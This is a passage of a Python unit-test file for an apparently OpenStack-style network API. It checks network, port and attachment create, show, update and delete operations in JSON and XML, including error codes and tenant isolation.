show_network_req = testlib.show_network_detail_request(self.tenant_id,
network_id,
fmt)
show_network_res = show_network_req.get_response(self.api)
self.assertEqual(show_network_res.status_int, 200)
network_data = self._deserialize_net_response(content_type,
show_network_res)
self.assert_network_details(id=network_id, name=self.network_name,
port_id=port_id, port_state='ACTIVE',
network_data=network_data['network'])
LOG.debug("_test_show_network_detail - fmt:%s - END", fmt)
def _test_show_network_not_found(self, fmt):
LOG.debug("_test_show_network_not_found - fmt:%s - START", fmt)
show_network_req = testlib.show_network_request(self.tenant_id,
"A_BAD_ID",
fmt)
show_network_res = show_network_req.get_response(self.api)
self.assertEqual(show_network_res.status_int,
self._network_not_found_code)
LOG.debug("_test_show_network_not_found - fmt:%s - END", fmt)
def _test_rename_network(self, fmt):
LOG.debug("_test_rename_network - fmt:%s - START", fmt)
content_type = "application/%s" % fmt
new_name = 'new_network_name'
network_id = self._create_network(fmt)
update_network_req = testlib.update_network_request(self.tenant_id,
network_id,
new_name,
fmt)
update_network_res = update_network_req.get_response(self.api)
self.assertEqual(update_network_res.status_int, 204)
show_network_req = testlib.show_network_request(self.tenant_id,
network_id,
fmt)
show_network_res = show_network_req.get_response(self.api)
self.assertEqual(show_network_res.status_int, 200)
network_data = self._deserialize_net_response(content_type,
show_network_res)
self.assert_network(id=network_id, name=new_name,
network_data=network_data['network'])
LOG.debug("_test_rename_network - fmt:%s - END", fmt)
def _test_rename_network_badrequest(self, fmt):
LOG.debug("_test_rename_network_badrequest - fmt:%s - START", fmt)
network_id = self._create_network(fmt)
bad_body = {'network': {'bad-attribute': 'very-bad'}}
update_network_req = testlib.update_network_request(
self.tenant_id,
network_id, fmt,
custom_req_body=bad_body)
update_network_res = update_network_req.get_response(self.api)
self.assertEqual(update_network_res.status_int, 400)
LOG.debug("_test_rename_network_badrequest - fmt:%s - END", fmt)
def _test_rename_network_not_found(self, fmt):
LOG.debug("_test_rename_network_not_found - fmt:%s - START", fmt)
new_name = 'new_network_name'
update_network_req = testlib.update_network_request(self.tenant_id,
"A BAD ID",
new_name,
fmt)
update_network_res = update_network_req.get_response(self.api)
self.assertEqual(update_network_res.status_int,
self._network_not_found_code)
LOG.debug("_test_rename_network_not_found - fmt:%s - END", fmt)
def _test_delete_network(self, fmt):
LOG.debug("_test_delete_network - fmt:%s - START", fmt)
content_type = "application/%s" % fmt
network_id = self._create_network(fmt)
LOG.debug("Deleting network %s of tenant %s" %
(network_id, self.tenant_id))
delete_network_req = testlib.network_delete_request(self.tenant_id,
network_id,
fmt)
delete_network_res = delete_network_req.get_response(self.api)
self.assertEqual(delete_network_res.status_int, 204)
list_network_req = testlib.network_list_request(self.tenant_id,
fmt)
list_network_res = list_network_req.get_response(self.api)
network_list_data = (self._net_deserializers[content_type].
deserialize(list_network_res.body)['body'])
network_count = len(network_list_data['networks'])
self.assertEqual(network_count, 0)
LOG.debug("_test_delete_network - fmt:%s - END", fmt)
def _test_delete_network_in_use(self, fmt):
LOG.debug("_test_delete_network_in_use - fmt:%s - START", fmt)
port_state = "ACTIVE"
attachment_id = "test_attachment"
network_id = self._create_network(fmt)
LOG.debug("Deleting network %s of tenant %s" %
(network_id, self.tenant_id))
port_id = self._create_port(network_id, port_state, fmt)
#plug an attachment into the port
LOG.debug("Putting attachment into port %s", port_id)
attachment_req = testlib.put_attachment_request(self.tenant_id,
network_id,
port_id,
attachment_id)
attachment_res = attachment_req.get_response(self.api)
self.assertEquals(attachment_res.status_int, 204)
LOG.debug("Deleting network %s of tenant %s" %
(network_id, self.tenant_id))
delete_network_req = testlib.network_delete_request(self.tenant_id,
network_id,
fmt)
delete_network_res = delete_network_req.get_response(self.api)
self.assertEqual(delete_network_res.status_int,
self._network_in_use_code)
LOG.debug("_test_delete_network_in_use - fmt:%s - END", fmt)
def _test_delete_network_with_unattached_port(self, fmt):
LOG.debug("_test_delete_network_with_unattached_port "
"- fmt:%s - START", fmt)
port_state = "ACTIVE"
network_id = self._create_network(fmt)
LOG.debug("Deleting network %s of tenant %s" %
(network_id, self.tenant_id))
self._create_port(network_id, port_state, fmt)
LOG.debug("Deleting network %s of tenant %s" %
(network_id, self.tenant_id))
delete_network_req = testlib.network_delete_request(self.tenant_id,
network_id,
fmt)
delete_network_res = delete_network_req.get_response(self.api)
self.assertEqual(delete_network_res.status_int, 204)
LOG.debug("_test_delete_network_with_unattached_port - fmt:%s - END",
fmt)
def _test_list_ports(self, fmt):
LOG.debug("_test_list_ports - fmt:%s - START", fmt)
content_type = "application/%s" % fmt
port_state = "ACTIVE"
network_id = self._create_network(fmt)
self._create_port(network_id, port_state, fmt)
self._create_port(network_id, port_state, fmt)
list_port_req = testlib.port_list_request(self.tenant_id,
network_id, fmt)
list_port_res = list_port_req.get_response(self.api)
self.assertEqual(list_port_res.status_int, 200)
port_data = (self._port_deserializers[content_type].
deserialize(list_port_res.body)['body'])
# Check port count: should return 2
self.assertEqual(len(port_data['ports']), 2)
LOG.debug("_test_list_ports - fmt:%s - END", fmt)
def _test_list_ports_networknotfound(self, fmt):
LOG.debug("_test_list_ports_networknotfound"
" - fmt:%s - START", fmt)
list_port_req = testlib.port_list_request(self.tenant_id,
"A_BAD_ID", fmt)
list_port_res = list_port_req.get_response(self.api)
self.assertEqual(list_port_res.status_int,
self._network_not_found_code)
LOG.debug("_test_list_ports_networknotfound - fmt:%s - END", fmt)
def _test_list_ports_detail(self, fmt):
LOG.debug("_test_list_ports_detail - fmt:%s - START", fmt)
content_type = "application/%s" % fmt
port_state = "ACTIVE"
network_id = self._create_network(fmt)
self._create_port(network_id, port_state, fmt)
self._create_port(network_id, port_state, fmt)
list_port_req = testlib.port_list_detail_request(self.tenant_id,
network_id, fmt)
list_port_res = list_port_req.get_response(self.api)
self.assertEqual(list_port_res.status_int, 200)
port_data = (self._port_deserializers[content_type].
deserialize(list_port_res.body)['body'])
# Check port count: should return 2
self.assertEqual(len(port_data['ports']), 2)
# Check contents - id & name for each network
for port in port_data['ports']:
self.assertTrue('id' in port and 'state' in port)
self.assertTrue(port['id'] and port['state'])
LOG.debug("_test_list_ports_detail - fmt:%s - END", fmt)
def _test_show_port(self, fmt):
LOG.debug("_test_show_port - fmt:%s - START", fmt)
content_type = "application/%s" % fmt
port_state = "ACTIVE"
network_id = self._create_network(fmt)
port_id = self._create_port(network_id, port_state, fmt)
show_port_req = testlib.show_port_request(self.tenant_id,
network_id, port_id,
fmt)
show_port_res = show_port_req.get_response(self.api)
self.assertEqual(show_port_res.status_int, 200)
port_data = self._deserialize_port_response(content_type,
show_port_res)
self.assert_port(id=port_id, state=port_state,
port_data=port_data['port'])
LOG.debug("_test_show_port - fmt:%s - END", fmt)
def _test_show_port_detail(self, fmt):
LOG.debug("_test_show_port - fmt:%s - START", fmt)
content_type = "application/%s" % fmt
port_state = "ACTIVE"
network_id = self._create_network(fmt)
port_id = self._create_port(network_id, port_state, fmt)
# Part 1 - no attachment
show_port_req = testlib.show_port_detail_request(
self.tenant_id, network_id, port_id, fmt)
show_port_res = show_port_req.get_response(self.api)
self.assertEqual(show_port_res.status_int, 200)
port_data = self._deserialize_port_response(content_type,
show_port_res)
self.assert_port(id=port_id, state=port_state,
port_data=port_data['port'])
# Part 2 - plug attachment into port
interface_id = "test_interface"
put_attachment_req = testlib.put_attachment_request(self.tenant_id,
network_id,
port_id,
interface_id,
fmt)
put_attachment_res = put_attachment_req.get_response(self.api)
self.assertEqual(put_attachment_res.status_int, 204)
show_port_req = testlib.show_port_detail_request(
self.tenant_id, network_id, port_id, fmt)
show_port_res = show_port_req.get_response(self.api)
self.assertEqual(show_port_res.status_int, 200)
port_data = self._deserialize_port_response(content_type,
show_port_res)
self.assert_port_attachment(id=port_id, state=port_state,
interface_id=interface_id,
port_data=port_data['port'])
LOG.debug("_test_show_port_detail - fmt:%s - END", fmt)
def _test_show_port_networknotfound(self, fmt):
LOG.debug("_test_show_port_networknotfound - fmt:%s - START", fmt)
port_state = "ACTIVE"
network_id = self._create_network(fmt)
port_id = self._create_port(network_id, port_state, fmt)
show_port_req = testlib.show_port_request(self.tenant_id,
"A_BAD_ID", port_id,
fmt)
show_port_res = show_port_req.get_response(self.api)
self.assertEqual(show_port_res.status_int,
self._network_not_found_code)
LOG.debug("_test_show_port_networknotfound - fmt:%s - END", fmt)
def _test_show_port_portnotfound(self, fmt):
LOG.debug("_test_show_port_portnotfound - fmt:%s - START", fmt)
network_id = self._create_network(fmt)
show_port_req = testlib.show_port_request(self.tenant_id,
network_id,
"A_BAD_ID",
fmt)
show_port_res = show_port_req.get_response(self.api)
self.assertEqual(show_port_res.status_int,
self._port_not_found_code)
LOG.debug("_test_show_port_portnotfound - fmt:%s - END", fmt)
def _test_create_port_noreqbody(self, fmt):
LOG.debug("_test_create_port_noreqbody - fmt:%s - START", fmt)
content_type = "application/%s" % fmt
network_id = self._create_network(fmt)
port_id = self._create_port(network_id, None, fmt,
custom_req_body='')
show_port_req = testlib.show_port_request(self.tenant_id,
network_id, port_id, fmt)
show_port_res = show_port_req.get_response(self.api)
self.assertEqual(show_port_res.status_int, 200)
port_data = (self._port_deserializers[content_type].
deserialize(show_port_res.body)['body'])
self.assertEqual(port_id, port_data['port']['id'])
LOG.debug("_test_create_port_noreqbody - fmt:%s - END", fmt)
def _test_create_port(self, fmt):
LOG.debug("_test_create_port - fmt:%s - START", fmt)
content_type = "application/%s" % fmt
port_state = "ACTIVE"
network_id = self._create_network(fmt)
port_id = self._create_port(network_id, port_state, fmt)
show_port_req = testlib.show_port_request(self.tenant_id,
network_id, port_id, fmt)
show_port_res = show_port_req.get_response(self.api)
self.assertEqual(show_port_res.status_int, 200)
port_data = (self._port_deserializers[content_type].
deserialize(show_port_res.body)['body'])
self.assertEqual(port_id, port_data['port']['id'])
LOG.debug("_test_create_port - fmt:%s - END", fmt)
def _test_create_port_networknotfound(self, fmt):
LOG.debug("_test_create_port_networknotfound - fmt:%s - START", fmt)
port_state = "ACTIVE"
self._create_port("A_BAD_ID", port_state, fmt,
expected_res_status=self._network_not_found_code)
LOG.debug("_test_create_port_networknotfound - fmt:%s - END", fmt)
def _test_create_port_badrequest(self, fmt):
LOG.debug("_test_create_port_badrequest - fmt:%s - START", fmt)
bad_body = {'bad-resource': {'bad-attribute': 'bad-value'}}
network_id = self._create_network(fmt)
port_state = "ACTIVE"
self._create_port(network_id, port_state, fmt,
custom_req_body=bad_body, expected_res_status=400)
LOG.debug("_test_create_port_badrequest - fmt:%s - END", fmt)
def _test_create_port_badportstate(self, fmt):
LOG.debug("_test_create_port_badportstate - fmt:%s - START", fmt)
network_id = self._create_network(fmt)
port_state = "BADSTATE"
self._create_port(network_id, port_state, fmt,
expected_res_status=self._port_state_invalid_code)
LOG.debug("_test_create_port_badportstate - fmt:%s - END", fmt)
def _test_delete_port(self, fmt):
LOG.debug("_test_delete_port - fmt:%s - START", fmt)
content_type = "application/%s" % fmt
port_state = "ACTIVE"
network_id = self._create_network(fmt)
port_id = self._create_port(network_id, port_state, fmt)
LOG.debug("Deleting port %s for network %s of tenant %s" %
(port_id, network_id, self.tenant_id))
delete_port_req = testlib.port_delete_request(self.tenant_id,
network_id, port_id,
fmt)
delete_port_res = delete_port_req.get_response(self.api)
self.assertEqual(delete_port_res.status_int, 204)
list_port_req = testlib.port_list_request(self.tenant_id, network_id,
fmt)
list_port_res = list_port_req.get_response(self.api)
port_list_data = (self._port_deserializers[content_type].
deserialize(list_port_res.body)['body'])
port_count = len(port_list_data['ports'])
self.assertEqual(port_count, 0)
LOG.debug("_test_delete_port - fmt:%s - END", fmt)
def _test_delete_port_in_use(self, fmt):
LOG.debug("_test_delete_port_in_use - fmt:%s - START", fmt)
port_state = "ACTIVE"
attachment_id = "test_attachment"
network_id = self._create_network(fmt)
port_id = self._create_port(network_id, port_state, fmt)
#plug an attachment into the port
LOG.debug("Putting attachment into port %s", port_id)
attachment_req = testlib.put_attachment_request(self.tenant_id,
network_id,
port_id,
attachment_id)
attachment_res = attachment_req.get_response(self.api)
self.assertEquals(attachment_res.status_int, 204)
LOG.debug("Deleting port %s for network %s of tenant %s" %
(port_id, network_id, self.tenant_id))
delete_port_req = testlib.port_delete_request(self.tenant_id,
network_id, port_id,
fmt)
delete_port_res = delete_port_req.get_response(self.api)
self.assertEqual(delete_port_res.status_int,
self._port_in_use_code)
LOG.debug("_test_delete_port_in_use - fmt:%s - END", fmt)
def _test_delete_port_with_bad_id(self, fmt):
LOG.debug("_test_delete_port_with_bad_id - fmt:%s - START", fmt)
port_state = "ACTIVE"
network_id = self._create_network(fmt)
self._create_port(network_id, port_state, fmt)
# Test for portnotfound
delete_port_req = testlib.port_delete_request(self.tenant_id,
network_id, "A_BAD_ID",
fmt)
delete_port_res = delete_port_req.get_response(self.api)
self.assertEqual(delete_port_res.status_int,
self._port_not_found_code)
LOG.debug("_test_delete_port_with_bad_id - fmt:%s - END", fmt)
def _test_delete_port_networknotfound(self, fmt):
LOG.debug("_test_delete_port_networknotfound - fmt:%s - START", fmt)
port_state = "ACTIVE"
network_id = self._create_network(fmt)
port_id = self._create_port(network_id, port_state, fmt)
delete_port_req = testlib.port_delete_request(self.tenant_id,
"A_BAD_ID", port_id,
fmt)
delete_port_res = delete_port_req.get_response(self.api)
self.assertEqual(delete_port_res.status_int,
self._network_not_found_code)
LOG.debug("_test_delete_port_networknotfound - fmt:%s - END", fmt)
def _test_set_port_state(self, fmt):
LOG.debug("_test_set_port_state - fmt:%s - START", fmt)
content_type = "application/%s" % fmt
port_state = 'DOWN'
new_port_state = 'ACTIVE'
network_id = self._create_network(fmt)
port_id = self._create_port(network_id, port_state, fmt)
update_port_req = testlib.update_port_request(self.tenant_id,
network_id, port_id,
new_port_state,
fmt)
update_port_res = update_port_req.get_response(self.api)
self.assertEqual(update_port_res.status_int, 204)
show_port_req = testlib.show_port_request(self.tenant_id,
network_id, port_id,
fmt)
show_port_res = show_port_req.get_response(self.api)
self.assertEqual(show_port_res.status_int, 200)
port_data = self._deserialize_port_response(content_type,
show_port_res)
self.assert_port(id=port_id, state=new_port_state,
port_data=port_data['port'])
# now set it back to the original value
update_port_req = testlib.update_port_request(self.tenant_id,
network_id, port_id,
port_state,
fmt)
update_port_res = update_port_req.get_response(self.api)
self.assertEqual(update_port_res.status_int, 204)
show_port_req = testlib.show_port_request(self.tenant_id,
network_id, port_id,
fmt)
show_port_res = show_port_req.get_response(self.api)
self.assertEqual(show_port_res.status_int, 200)
port_data = self._deserialize_port_response(content_type,
show_port_res)
self.assert_port(id=port_id, state=port_state,
port_data=port_data['port'])
LOG.debug("_test_set_port_state - fmt:%s - END", fmt)
def _test_set_port_state_networknotfound(self, fmt):
LOG.debug("_test_set_port_state_networknotfound - fmt:%s - START", fmt)
port_state = 'DOWN'
new_port_state = 'ACTIVE'
network_id = self._create_network(fmt)
port_id = self._create_port(network_id, port_state, fmt)
update_port_req = testlib.update_port_request(self.tenant_id,
"A_BAD_ID", port_id,
new_port_state,
fmt)
update_port_res = update_port_req.get_response(self.api)
self.assertEqual(update_port_res.status_int,
self._network_not_found_code)
LOG.debug("_test_set_port_state_networknotfound - fmt:%s - END", fmt)
def _test_set_port_state_portnotfound(self, fmt):
LOG.debug("_test_set_port_state_portnotfound - fmt:%s - START", fmt)
port_state = 'DOWN'
new_port_state = 'ACTIVE'
network_id = self._create_network(fmt)
self._create_port(network_id, port_state, fmt)
update_port_req = testlib.update_port_request(self.tenant_id,
network_id,
"A_BAD_ID",
new_port_state,
fmt)
update_port_res = update_port_req.get_response(self.api)
self.assertEqual(update_port_res.status_int,
self._port_not_found_code)
LOG.debug("_test_set_port_state_portnotfound - fmt:%s - END", fmt)
def _test_set_port_state_stateinvalid(self, fmt):
LOG.debug("_test_set_port_state_stateinvalid - fmt:%s - START", fmt)
port_state = 'DOWN'
new_port_state = 'A_BAD_STATE'
network_id = self._create_network(fmt)
port_id = self._create_port(network_id, port_state, fmt)
update_port_req = testlib.update_port_request(self.tenant_id,
network_id, port_id,
new_port_state,
fmt)
update_port_res = update_port_req.get_response(self.api)
self.assertEqual(update_port_res.status_int,
self._port_state_invalid_code)
LOG.debug("_test_set_port_state_stateinvalid - fmt:%s - END", fmt)
def _test_show_attachment(self, fmt):
LOG.debug("_test_show_attachment - fmt:%s - START", fmt)
content_type = "application/%s" % fmt
port_state = "ACTIVE"
network_id = self._create_network(fmt)
interface_id = "test_interface"
port_id = self._create_port(network_id, port_state, fmt)
put_attachment_req = testlib.put_attachment_request(self.tenant_id,
network_id,
port_id,
interface_id,
fmt)
put_attachment_res = put_attachment_req.get_response(self.api)
self.assertEqual(put_attachment_res.status_int, 204)
get_attachment_req = testlib.get_attachment_request(self.tenant_id,
network_id,
port_id,
fmt)
get_attachment_res = get_attachment_req.get_response(self.api)
attachment_data = (self._att_deserializers[content_type].
deserialize(get_attachment_res.body)['body'])
self.assertEqual(attachment_data['attachment']['id'], interface_id)
LOG.debug("_test_show_attachment - fmt:%s - END", fmt)
def _test_show_attachment_none_set(self, fmt):
LOG.debug("_test_show_attachment_none_set - fmt:%s - START", fmt)
content_type = "application/%s" % fmt
port_state = "ACTIVE"
network_id = self._create_network(fmt)
port_id = self._create_port(network_id, port_state, fmt)
get_attachment_req = testlib.get_attachment_request(self.tenant_id,
network_id,
port_id,
fmt)
get_attachment_res = get_attachment_req.get_response(self.api)
attachment_data = (self._att_deserializers[content_type].
deserialize(get_attachment_res.body)['body'])
self.assertTrue('id' not in attachment_data['attachment'])
LOG.debug("_test_show_attachment_none_set - fmt:%s - END", fmt)
def _test_show_attachment_networknotfound(self, fmt):
LOG.debug("_test_show_attachment_networknotfound - fmt:%s - START",
fmt)
port_state = "ACTIVE"
network_id = self._create_network(fmt)
port_id = self._create_port(network_id, port_state, fmt)
get_attachment_req = testlib.get_attachment_request(self.tenant_id,
"A_BAD_ID",
port_id,
fmt)
get_attachment_res = get_attachment_req.get_response(self.api)
self.assertEqual(get_attachment_res.status_int,
self._network_not_found_code)
LOG.debug("_test_show_attachment_networknotfound - fmt:%s - END", fmt)
def _test_show_attachment_portnotfound(self, fmt):
LOG.debug("_test_show_attachment_portnotfound - fmt:%s - START", fmt)
port_state = "ACTIVE"
network_id = self._create_network(fmt)
self._create_port(network_id, port_state, fmt)
get_attachment_req = testlib.get_attachment_request(self.tenant_id,
network_id,
"A_BAD_ID",
fmt)
get_attachment_res = get_attachment_req.get_response(self.api)
self.assertEqual(get_attachment_res.status_int,
self._port_not_found_code)
LOG.debug("_test_show_attachment_portnotfound - fmt:%s - END", fmt)
def _test_put_attachment(self, fmt):
LOG.debug("_test_put_attachment - fmt:%s - START", fmt)
port_state = "ACTIVE"
network_id = self._create_network(fmt)
interface_id = "test_interface"
port_id = self._create_port(network_id, port_state, fmt)
put_attachment_req = testlib.put_attachment_request(self.tenant_id,
network_id,
port_id,
interface_id,
fmt)
put_attachment_res = put_attachment_req.get_response(self.api)
self.assertEqual(put_attachment_res.status_int, 204)
LOG.debug("_test_put_attachment - fmt:%s - END", fmt)
def _test_put_attachment_networknotfound(self, fmt):
LOG.debug("_test_put_attachment_networknotfound - fmt:%s - START", fmt)
port_state = 'DOWN'
interface_id = "test_interface"
network_id = self._create_network(fmt)
port_id = self._create_port(network_id, port_state, fmt)
put_attachment_req = testlib.put_attachment_request(self.tenant_id,
"A_BAD_ID",
port_id,
interface_id,
fmt)
put_attachment_res = put_attachment_req.get_response(self.api)
self.assertEqual(put_attachment_res.status_int,
self._network_not_found_code)
LOG.debug("_test_put_attachment_networknotfound - fmt:%s - END", fmt)
def _test_put_attachment_portnotfound(self, fmt):
LOG.debug("_test_put_attachment_portnotfound - fmt:%s - START", fmt)
port_state = 'DOWN'
interface_id = "test_interface"
network_id = self._create_network(fmt)
self._create_port(network_id, port_state, fmt)
put_attachment_req = testlib.put_attachment_request(self.tenant_id,
network_id,
"A_BAD_ID",
interface_id,
fmt)
put_attachment_res = put_attachment_req.get_response(self.api)
self.assertEqual(put_attachment_res.status_int,
self._port_not_found_code)
LOG.debug("_test_put_attachment_portnotfound - fmt:%s - END", fmt)
def _test_delete_attachment(self, fmt):
LOG.debug("_test_delete_attachment - fmt:%s - START", fmt)
port_state = "ACTIVE"
network_id = self._create_network(fmt)
interface_id = "test_interface"
port_id = self._create_port(network_id, port_state, fmt)
put_attachment_req = testlib.put_attachment_request(self.tenant_id,
network_id,
port_id,
interface_id,
fmt)
put_attachment_res = put_attachment_req.get_response(self.api)
self.assertEqual(put_attachment_res.status_int, 204)
del_attachment_req = testlib.delete_attachment_request(self.tenant_id,
network_id,
port_id,
fmt)
del_attachment_res = del_attachment_req.get_response(self.api)
self.assertEqual(del_attachment_res.status_int, 204)
LOG.debug("_test_delete_attachment - fmt:%s - END", fmt)
def _test_delete_attachment_networknotfound(self, fmt):
LOG.debug("_test_delete_attachment_networknotfound - fmt:%s - START",
fmt)
port_state = "ACTIVE"
network_id = self._create_network(fmt)
port_id = self._create_port(network_id, port_state, fmt)
del_attachment_req = testlib.delete_attachment_request(self.tenant_id,
"A_BAD_ID",
port_id,
fmt)
del_attachment_res = del_attachment_req.get_response(self.api)
self.assertEqual(del_attachment_res.status_int,
self._network_not_found_code)
LOG.debug("_test_delete_attachment_networknotfound - fmt:%s - END",
fmt)
def _test_delete_attachment_portnotfound(self, fmt):
LOG.debug("_test_delete_attachment_portnotfound - fmt:%s - START", fmt)
port_state = "ACTIVE"
network_id = self._create_network(fmt)
self._create_port(network_id, port_state, fmt)
del_attachment_req = testlib.delete_attachment_request(self.tenant_id,
network_id,
"A_BAD_ID",
fmt)
del_attachment_res = del_attachment_req.get_response(self.api)
self.assertEqual(del_attachment_res.status_int,
self._port_not_found_code)
LOG.debug("_test_delete_attachment_portnotfound - fmt:%s - END", fmt)
def _test_unparsable_data(self, fmt):
LOG.debug("_test_unparsable_data - fmt:%s - START", fmt)
data = "this is not json or xml"
method = 'POST'
content_type = "application/%s" % fmt
tenant_id = self.tenant_id
path = "/tenants/%(tenant_id)s/networks.%(fmt)s" % locals()
network_req = testlib.create_request(path, data, content_type, method)
network_res = network_req.get_response(self.api)
self.assertEqual(network_res.status_int, 400)
LOG.debug("_test_unparsable_data - fmt:%s - END", fmt)
def _test_multitenancy(self, fmt):
LOG.debug("_test_multitenancy - fmt:%s - START", fmt)
# creates a network for tenant self.tenant_id
net_id = self._create_network(fmt)
port_id = self._create_port(net_id, "ACTIVE", fmt)
invalid_tenant = self.tenant_id + "-invalid"
def assert_net_not_found(base_path, method, fmt):
content_type = "application/%s" % fmt
full_path = "%s.%s" % (base_path, fmt)
req = testlib.create_request(full_path, None, content_type)
res = req.get_response(self.api)
self.assertEqual(res.status_int, self._network_not_found_code)
# new tenant should NOT see this network UUID
net_path = "/tenants/%(invalid_tenant)s/networks/%(net_id)s" % locals()
net_detail_path = net_path + "/detail"
assert_net_not_found(net_path, 'GET', fmt)
assert_net_not_found(net_path, 'PUT', fmt)
assert_net_not_found(net_path, 'DELETE', fmt)
assert_net_not_found(net_detail_path, 'GET', fmt)
# new tenant should NOT see this network + port UUID
port_all_path = net_path + "/ports"
port_path = "%s/%s" % (port_all_path, port_id)
port_detail_path = port_path + "/detail"
# NOTE: we actually still check for a network not found
# error here, as both the network and port in the URL are
# invalid. This is consistent with the test
# _test_show_port_networknotfound
assert_net_not_found(port_all_path, 'POST', fmt)
assert_net_not_found(port_all_path, 'GET', fmt)
assert_net_not_found(port_path, 'GET', fmt)
assert_net_not_found(port_path, 'PUT', fmt)
assert_net_not_found(port_path, 'DELETE', fmt)
assert_net_not_found(port_detail_path, 'GET', fmt)
attach_path = port_path + "/attachment"
assert_net_not_found(attach_path, 'GET', fmt)
assert_net_not_found(attach_path, 'PUT', fmt)
assert_net_not_found(attach_path, 'DELETE', fmt)
LOG.debug("_test_multitenancy - fmt:%s - END", fmt)
def test_list_networks_json(self):
self._test_list_networks('json')
def test_list_networks_xml(self):
self._test_list_networks('xml')
def test_list_networks_detail_json(self):
self._test_list_networks_detail('json')
def test_list_networks_detail_xml(self):
self._test_list_networks_detail('xml')
def test_create_network_json(self):
self._test_create_network('json')
def test_create_network_xml(self):
self._test_create_network('xml')
def test_create_network_badrequest_json(self):
self._test_create_network_badrequest('json')
def test_create_network_badrequest_xml(self):
self._test_create_network_badrequest('xml')
def test_show_network_not_found_json(self):
self._test_show_network_not_found('json')
def test_show_network_not_found_xml(self):
self._test_show_network_not_found('xml')
def test_show_network_json(self):
self._test_show_network('json')
def test_show_network_xml(self):
self._test_show_network('xml')
def test_show_network_detail_json(self):
self._test_show_network_detail('json')
def test_show_network_detail_xml(self):
self._test_show_network_detail('xml')
def test_delete_network_json(self):
self._test_delete_network('json')
def test_delete_network_xml(self):
self._test_delete_network('xml')
def test_rename_network_json(self):
self._test_rename_network('json')
def test_rename_network_xml(self):
self._test_rename_network('xml')
def test_rename_network_badrequest_json(self):
self._test_rename_network_badrequest('json')
def test_rename_network_badrequest_xml(self):
self._test_rename_network_badrequest('xml')
def test_rename_network_not_found_json(self):
self._test_rename_network_not_found('json')
def test_rename_network_not_found_xml(self):
self._test_rename_network_not_found('xml')
def test_delete_network_in_use_json(self):
self._test_delete_network_in_use('json')
def test_delete_network_in_use_xml(self):
self._test_delete_network_in_use('xml')
def test_delete_network_with_unattached_port_xml(self):
self._test_delete_network_with_unattached_port('xml')
def test_delete_network_with_unattached_port_json(self):
self._test_delete_network_with_unattached_port('json')
def test_list_ports_json(self):
self._test_list_ports('json')
def test_list_ports_xml(self):
self._test_list_ports('xml')
def test_list_ports_networknotfound_json(self):
self._test_list_ports_networknotfound('json')
def test_list_ports_networknotfound_xml(self):
self._test_list_ports_networknotfound('xml')
def test_list_ports_detail_json(self):
self._test_list_ports_detail('json')
def test_list_ports_detail_xml(self):
self._test_list_ports_detail('xml')
def test_show_port_json(self):
self._test_show_port('json')
def test_show_port_xml(self):
self._test_show_port('xml')
def test_show_port_detail_json(self):
self._test_show_port_detail('json')
def test_show_port_detail_xml(self):
self._test_show_port_detail('xml')
def test_show_port_networknotfound_json(self):
self._test_show_port_networknotfound('json')
def test_show_port_networknotfound_xml(self):
self._test_show_port_networknotfound('xml')
def test_show_port_portnotfound_json(self):
self._test_show_port_portnotfound('json')
def test_show_port_portnotfound_xml(self):
self._test_show_port_portnotfound('xml')
def test_create_port_json(self):
self._test_create_port('json')
def test_create_port_xml(self):
self._test_create_port('xml')
def test_create_port_noreqbody_json(self):
self._test_create_port_noreqbody('json')
def test_create_port_noreqbody_xml(self):
self._test_create_port_noreqbody('xml')
def test_create_port_networknotfound_json(self):
self._test_create_port_networknotfound('json')
def test_create_port_networknotfound_xml(self):
self._test_create_port_networknotfound('xml')
def test_create_port_badrequest_json(self):
self._test_create_port_badrequest('json')
def test_create_port_badrequest_xml(self):
self._test_create_port_badrequest('xml')
def test_create_port_badportstate_json(self):
self._test_create_port_badportstate('json')
def test_create_port_badportstate_xml(self):
self._test_create_port_badportstate('xml')
def test_delete_port_xml(self):
self._test_delete_port('xml')
def test_delete_port_json(self):
self._test_delete_port('json')
def test_delete_port_in_use_xml(self):
self._test_delete_port_in_use('xml')
def test_delete_port_in_use_json(self):
self._test_delete_port_in_use('json')
def test_delete_port_networknotfound_xml(self):
self._test_delete_port_networknotfound('xml')
def test_delete_port_networknotfound_json(self):
self._test_delete_port_networknotfound('json')
def test_delete_port_with_bad_id_xml(self):
self._test_delete_port_with_bad_id('xml')
def test_delete_port_with_bad_id_json(self):
self._test_delete_port_with_bad_id('json')
def test_set_port_state_xml(self):
self._test_set_port_state('xml')
def test_set_port_state_json(self):
self._test_set_port_state('json')
def test_set_port_state_networknotfound_xml(self):
self._test_set_port_state_networknotfound('xml')
def test_set_port_state_networknotfound_json(self):
self._test_set_port_state_networknotfound('json')
def test_set_port_state_portnotfound_xml(self):
self._test_set_port_state_portnotfound('xml')
def test_set_port_state_portnotfound_json(self):
self._test_set_port_state_portnotfound('json')
def test_set_port_state_stateinvalid_xml(self):
self._test_set_port_state_stateinvalid('xml')
def test_set_port_state_stateinvalid_json(self):
self._test_set_port_state_stateinvalid('json')
def test_show_attachment_xml(self):
self._test_show_attachment('xml')
def test_show_attachment_json(self):
self._test_show_attachment('json')
def test_show_attachment_none_set_xml(self):
self._test_show_attachment_none_set('xml')
def test_show_attachment_none_set_json(self):
self._test_show_attachment_none_set('json')
def test_show_attachment_networknotfound_xml(self):
self._test_show_attachment_networknotfound('xml')
def test_show_attachment_networknotfound_json(self):
self._test_show_attachment_networknotfound('json')
def test_show_attachment_portnotfound_xml(self):
self._test_show_attachment_portnotfound('xml')
def test_show_attachment_portnotfound_json(self):
self._test_show_attachment_portnotfound('json')
def test_put_attachment_xml(self):
self._test_put_attachment('xml')
def test_put_attachment_json(self):
self._test_put_attachment('json')
def test_put_attachment_networknotfound_xml(self):
self._test_put_attachment_networknotfound('xml')
def test_put_attachment_networknotfound_json(self):
self._test_put_attachment_networknotfound('json')
def test_put_attachment_portnotfound_xml(self):
self._test_put_attachment_portnotfound('xml')
def test_put_attachment_portnotfound_json(self):
self._test_put_attachment_portnotfound('json')
def test_delete_attachment_xml(self):
self._test_delete_attachment('xml')
def test_delete_attachment_json(self):
self._test_delete_attachment('json')
def test_delete_attachment_networknotfound_xml(self):
self._test_delete_attachment_networknotfound('xml')
def test_delete_attachment_networknotfound_json(self):
self._test_delete_attachment_networknotfound('json')
def test_delete_attachment_portnotfound_xml(self):
self._test_delete_attachment_portnotfound('xml')
def test_delete_attachment_portnotfound_json(self):
self._test_delete_attachment_portnotfound('json')
def test_unparsable_data_xml(self):
self._test_unparsable_data('xml')
def test_unparsable_data_json(self):
self._test_unparsable_data('json')
def test_multitenancy_xml(self):
self._test_multitenancy('xml')
def test_multitenancy_json(self):
